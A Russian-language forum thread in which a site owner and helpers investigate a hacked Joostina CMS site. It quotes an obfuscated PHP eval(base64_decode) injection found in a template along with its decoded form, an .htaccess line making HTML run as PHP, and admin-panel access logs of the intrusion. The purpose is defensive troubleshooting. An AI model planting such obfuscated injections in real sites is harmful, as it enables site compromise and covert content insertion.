Мне взломали один из сайтов на Joostina 1.3
  • MaiwendMaiwend Октябрь 2012
    Каким образом произошел взлом не знаю.
    Может быть хостер подскажет.

    Обнаружилось, когда страницы биржам статей стали передавать ошибку 500. Я был в отъезде как раз.
    Через логи нашлась ошибка в файле темплейта.

    Ошибку давало следующее постороннее включение:

    <?php eval(base64_decode("JGRiPSYgSkZhY3Rvcnk6OmdldERCTygpOyRxPSdTRUxFQ1QgYGNvbnRleHRgIEZST00gYGpvc19jb250ZXh0YCBMSU1JVCAxJzskZGItPnNldFF1ZXJ5KCRxKTskZGF0YV9yb3cgPSAkZGItPmxvYWRSb3coKTtlY2hvICRkYXRhX3Jvd1swXTs="));?>
  • doctorgrifdoctorgrif Октябрь 2012
    вот что после декода
    $db=& JFactory::getDBO();
    $q='SELECT `context` FROM `jos_context` LIMIT 1';
    $db->setQuery($q);
    $data_row = $db->loadRow();
    echo $data_row[0];

    еще "лишнее" в коде есть?
    Отредактированно doctorgrif в 2012-10-20 00:34:00
  • MaiwendMaiwend Октябрь 2012
    Изменение было только это. Еще заметил, что в двух других папках темплейтов, которые не используются, изменялись индексные файлы.

    Суппорт ответил, что из-за давности и ротации логов (я сам так настроил), ничего не могут сказать по поводу доступа.

    Я в тот деть как раз утром уехал и меня неделю не было. Коме этого сайта на хостинге еще несколько, но они не затронуты. Думаю, что в Joostine есть какая-то уязвимость, которой и воспользовался злоумышленник, другое дело, что возможно это уязвимость оставшаяся в наследство от Joomla.
    Joostina мало распространена и вряд ли неизвестный ломал именно нашу линейку CMS, чтобы вешать свой контекст.

    Таблицы jos_context в базе нет.
  • doctorgrifdoctorgrif Октябрь 2012
    что используется для бирж статей - их код для публикации, ручная публикация?
  • MaiwendMaiwend Октябрь 2012
    Все вручную, никаких самописных компонентов и плагинов.
    В общем-то, никакого секрета, вот этот сайт http://www.yakrashe.ru
  • doctorgrifdoctorgrif Октябрь 2012
    дай описание ошибки из лога... поковыряюсь на досуге
    Отредактированно doctorgrif в 2012-10-23 07:33:40
  • MaiwendMaiwend Октябрь 2012
    Все что есть:
    PHP Fatal error: Class 'JFactory' not found in /home/srv27576/yakrashe/templates/yakrashe/index.php(379) : eval()'d code on line 1.
  • doctorgrifdoctorgrif Октябрь 2012
    так...
    есть "левые" строки в htaccess?
    есть ли "левые" скрипты в папках уровнем выше корневой?
  • MaiwendMaiwend Октябрь 2012
    Из того, что добавлял я:
    php_flag magic_quotes_gpc on
    php_flag register_globals Off

    RewriteCond %{HTTP_HOST} ^yakrashe\.ru$
    RewriteRule ^(.*)$ http://www.yakrashe.ru/$1 [R=301,L]

    И вот в конце еще неизвестное нашел:
    AddHandler application/x-httpd-php .php .htm .html
  • mosgazmosgaz Ноябрь 2012
    Санитары интернета за работой.
    Отредактированно mosgaz в 2012-11-04 20:37:23
  • MaiwendMaiwend Ноябрь 2012
    Вот и на втором сайте появилась эта хрень.
  • MaiwendMaiwend Ноябрь 2012
    0.28.198 - - [03/Nov/2012:14:28:29 +0300] "GET /administrator/index.php?option=com_login&task=logout HTTP/1.1" 200 3415 "http://internat58.nichost.ru/administrator/index.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.elfsclan.ru 94.100.28.198 - - [03/Nov/2012:14:28:29 +0300] "GET /administrator/index.php HTTP/1.1" 200 3415 "http://internat58.nichost.ru/administrator/index.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.elfsclan.ru 94.100.28.198 - - [03/Nov/2012:14:28:29 +0300] "POST /administrator/index.php HTTP/1.1" 200 54 "http://www.elfsclan.ru/administrator/index.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.elfsclan.ru 94.100.28.198 - - [03/Nov/2012:14:28:29 +0300] "GET /administrator/index2.php?option=com_templates HTTP/1.1" 200 39496 "http://www.elfsclan.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.elfsclan.ru 94.100.28.198 - - [03/Nov/2012:14:28:30 +0300] "POST /administrator/index2.php HTTP/1.1" 200 55591 "http://www.elfsclan.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.elfsclan.ru 94.100.28.198 - - [03/Nov/2012:14:28:31 +0300] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.elfsclan.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.elfsclan.ru 94.100.28.198 - - [03/Nov/2012:14:28:31 +0300] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 39496 "http://www.elfsclan.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.elfsclan.ru 94.100.28.198 - - [03/Nov/2012:14:28:32 +0300] "GET /index.php HTTP/1.1" 200 65967 "-" "-"
    www.elfsclan.ru 94.100.28.198 - - [03/Nov/2012:14:28:33 +0300] "GET /templates/elfsclan/index.php HTTP/1.1" 200 39 "-" "-"
    www.elfsclan.ru 94.100.28.198 - - [03/Nov/2012:14:28:33 +0300] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.elfsclan.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.elfsclan.ru 94.100.28.198 - - [03/Nov/2012:14:28:34 +0300] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 39496 "http://www.elfsclan.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    Отредактированно Maiwend в 2012-11-09 07:11:54
  • MaiwendMaiwend Ноябрь 2012
    Народ сообщите ка Бостону, может он разберется как ломают? Все же он обещал критические правки делать.
  • MaiwendMaiwend Ноябрь 2012
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:35 +0300] "GET /administrator/index.php?option=com_login&task=logout HTTP/1.1" 200 3358 "http://littera-dialog.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:35 +0300] "GET /administrator/index.php HTTP/1.1" 200 3358 "http://littera-dialog.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:35 +0300] "POST /administrator/index.php HTTP/1.1" 200 54 "http://www.yakrashe.ru/administrator/index.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:36 +0300] "GET /administrator/index2.php?option=com_templates HTTP/1.1" 200 50424 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:36 +0300] "POST /administrator/index2.php HTTP/1.1" 200 64529 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:37 +0300] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:37 +0300] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 50424 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:39 +0300] "GET /index.php HTTP/1.1" 200 54522 "-" "-"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:40 +0300] "GET /templates/elfsclan/index.php HTTP/1.1" 500 39 "-" "-"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:40 +0300] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:40 +0300] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 50424 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:41 +0300] "POST /administrator/index2.php HTTP/1.1" 200 55426 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:42 +0300] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:43 +0300] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 50424 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:44 +0300] "GET /index.php HTTP/1.1" 200 54490 "-" "-"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:45 +0300] "GET /templates/newline2/index.php HTTP/1.1" 200 39 "-" "-"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:45 +0300] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:45 +0300] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 50424 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:46 +0300] "POST /administrator/index2.php HTTP/1.1" 200 67364 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:48 +0300] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:48 +0300] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 50424 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:49 +0300] "GET /index.php HTTP/1.1" 200 54575 "-" "-"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:50 +0300] "GET /templates/yakrashe/index.php HTTP/1.1" 200 39 "-" "-"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:50 +0300] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [03/Nov/2012:14:24:50 +0300] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 50424 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
  • doctorgrifdoctorgrif Ноябрь 2012
    2Maiwend
    отписал в личные сообщения - попробуй, по результатам сообщи
    если есть возможность то дай доступ (фтп) на хост
  • doctorgrifdoctorgrif Ноябрь 2012
    и проверь сайт с 1.5. джумлой :)
  • MaiwendMaiwend Ноябрь 2012
    Действия выполнил, буду ждать повторения.
  • GoDrGoDr Ноябрь 2012
    Лично я не понял в чём проблема... А JFactory это вообще для линейки 1.5+
  • MaiwendMaiwend Ноябрь 2012
    Может я ошибаюсь, но разве таким способом нельзя добавить и чего-то другого на сайт?
  • VladzimirVladzimir Ноябрь 2012
    Похоже что взлома как такового нет. Кто-то разлогинился на одном вашем сайте с Джумлой и залогинился в админку на Джустине. А дальше уже правил шаблон для заливки шелла.
  • VladzimirVladzimir Ноябрь 2012
    Да и не помешал бы error.log
  • MaiwendMaiwend Ноябрь 2012
    GET /administrator/index.php HTTP/1.1" 200 3415 "http://internat58.nichost.ru/
    GET /administrator/index.php HTTP/1.1" 200 3358 "http://littera-dialog.ru/

    Это не мои сайты и их два. А то и с десятку. Это явно робот делает.

    Эрорлог уже потерся.
  • MaiwendMaiwend Март 2013
    Все повторилось. Так что способы, которые предлагались доктором не работают в данном случае.
  • MaiwendMaiwend Март 2013
    access.log

    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:49 +0400] "GET /administrator/index.php?option=com_login&task=logout HTTP/1.1" 200 3358 "http://www.bez-nasledstva.ru/administrator/index.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:49 +0400] "GET /administrator/index.php HTTP/1.1" 200 3358 "http://www.bez-nasledstva.ru/administrator/index.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:49 +0400] "POST /administrator/index.php HTTP/1.1" 200 54 "http://www.yakrashe.ru/administrator/index.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:49 +0400] "GET /administrator/index2.php?option=com_templates HTTP/1.1" 200 49137 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:50 +0400] "POST /administrator/index2.php HTTP/1.1" 200 67364 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:52 +0400] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:52 +0400] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 49137 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:54 +0400] "GET /index.php HTTP/1.1" 200 53025 "-" "-"
    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:54 +0400] "GET /templates/yakrashe/index.php HTTP/1.1" 200 39 "-" "-"
    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:54 +0400] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    www.yakrashe.ru 94.100.28.198 - - [19/Mar/2013:00:04:55 +0400] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 49137 "http://www.yakrashe.ru/administrator/index2.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
  • MaiwendMaiwend Март 2013
    В error.log ничего в это время нет. И этот IP не фигурирует.
    Потом я вернул обратно шаблон без вставок и второй раз все повторилось в 21:03
  • MaiwendMaiwend Март 2013
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:01:25 +0400] "GET /administrator/index2.php?option=com_installer&element=template HTTP/1.1" 200 49996 "http://www.yakrashe.ru/administrator/index2.php?option=com_installer&element=template&client=" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:01:33 +0400] "GET /administrator/images/aload.gif HTTP/1.1" 200 2030 "http://www.yakrashe.ru/administrator/index2.php?option=com_installer&element=template" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:01:33 +0400] "GET /administrator/ajax.index.php?option=com_admin&task=toggle_editor HTTP/1.1" 200 82 "http://www.yakrashe.ru/administrator/index2.php?option=com_installer&element=template" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:01:34 +0400] "GET /administrator/templates/joostfree/images/ico/editor_off.png HTTP/1.1" 200 555 "http://www.yakrashe.ru/administrator/index2.php?option=com_installer&element=template" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:01:35 +0400] "GET /administrator/ajax.index.php?option=com_admin&task=toggle_editor HTTP/1.1" 200 81 "http://www.yakrashe.ru/administrator/index2.php?option=com_installer&element=template" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:01:57 +0400] "GET /administrator/index2.php?option=com_templates HTTP/1.1" 200 49137 "http://www.yakrashe.ru/administrator/index2.php?option=com_installer&element=template" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:01:58 +0400] "GET /administrator/templates/joostfree/images/toolbar_ico/apply.png HTTP/1.1" 200 524 "http://www.yakrashe.ru/administrator/index2.php?option=com_templates" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:01:58 +0400] "GET /administrator/templates/joostfree/images/toolbar_ico/html.png HTTP/1.1" 200 750 "http://www.yakrashe.ru/administrator/index2.php?option=com_templates" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:01:58 +0400] "GET /administrator/templates/joostfree/images/toolbar_ico/assign.png HTTP/1.1" 200 542 "http://www.yakrashe.ru/administrator/index2.php?option=com_templates" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:02:05 +0400] "POST /administrator/index2.php HTTP/1.1" 200 28856 "http://www.yakrashe.ru/administrator/index2.php?option=com_templates" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:02:05 +0400] "GET /administrator/templates/joostfree/images/toolbar_ico/save.png HTTP/1.1" 200 731 "http://www.yakrashe.ru/administrator/index2.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:02:05 +0400] "GET /administrator/templates/joostfree/images/toolbar_ico/cancel.png HTTP/1.1" 200 632 "http://www.yakrashe.ru/administrator/index2.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:02:05 +0400] "GET /administrator/templates/joostfree/images/input_bg.png HTTP/1.1" 200 366 "http://www.yakrashe.ru/administrator/index2.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:02:25 +0400] "GET /administrator/templates/joostfree/images/aload.gif HTTP/1.1" 200 2030 "http://www.yakrashe.ru/administrator/index2.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:02:25 +0400] "POST /administrator/ajax.index.php?option=com_templates&task=source HTTP/1.1" 200 38 "http://www.yakrashe.ru/administrator/index2.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:02:26 +0400] "GET /administrator/templates/joostfree/images/ico/info.png HTTP/1.1" 200 500 "http://www.yakrashe.ru/administrator/index2.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:02:27 +0400] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:02:27 +0400] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 49137 "http://www.yakrashe.ru/administrator/index2.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:02:39 +0400] "POST /administrator/index2.php HTTP/1.1" 200 29020 "http://www.yakrashe.ru/administrator/index2.php?option=com_templates&client=" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:03:05 +0400] "POST /administrator/index2.php HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:03:05 +0400] "GET /administrator/index2.php?option=com_templates&client= HTTP/1.1" 200 49137 "http://www.yakrashe.ru/administrator/index2.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 94.242.221.173 - - [19/Mar/2013:21:03:26 +0400] "POST / HTTP/1.1" 200 32 "http://www.yakrashe.ru/" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00"
    yakrashe.ru 176.14.20.20 - - [19/Mar/2013:21:03:30 +0400] "GET / HTTP/1.1" 301 333 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.70 Safari/537.17"
    www.yakrashe.ru 176.14.20.20 - - [19/Mar/2013:21:03:30 +0400] "GET / HTTP/1.1" 200 53411 "http://yakrashe.ru/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.70 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:03:32 +0400] "GET /administrator/index2.php?option=logout HTTP/1.1" 301 - "http://www.yakrashe.ru/administrator/index2.php?option=com_templates&client=" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:03:32 +0400] "GET /administrator/index.php HTTP/1.1" 200 3358 "http://www.yakrashe.ru/administrator/index2.php?option=com_templates&client=" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"
    www.yakrashe.ru 188.134.44.90 - - [19/Mar/2013:21:03:32 +0400] "GET /includes/libraries/kcaptcha/index.php?session=cacdb162191f3ef400abf0d9cb5d4a37 HTTP/1.1" 200 1185 "http://www.yakrashe.ru/administrator/index.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Ubuntu Chromium/24.0.1312.56 Chrome/24.0.1312.56 Safari/537.17"

Добро пожаловать!

Похоже, что Вы здесь впервые. Если хотите поучаствовать, нажмите на одну из этих кнопок!

Войти Зарегистрироваться

В теме отметились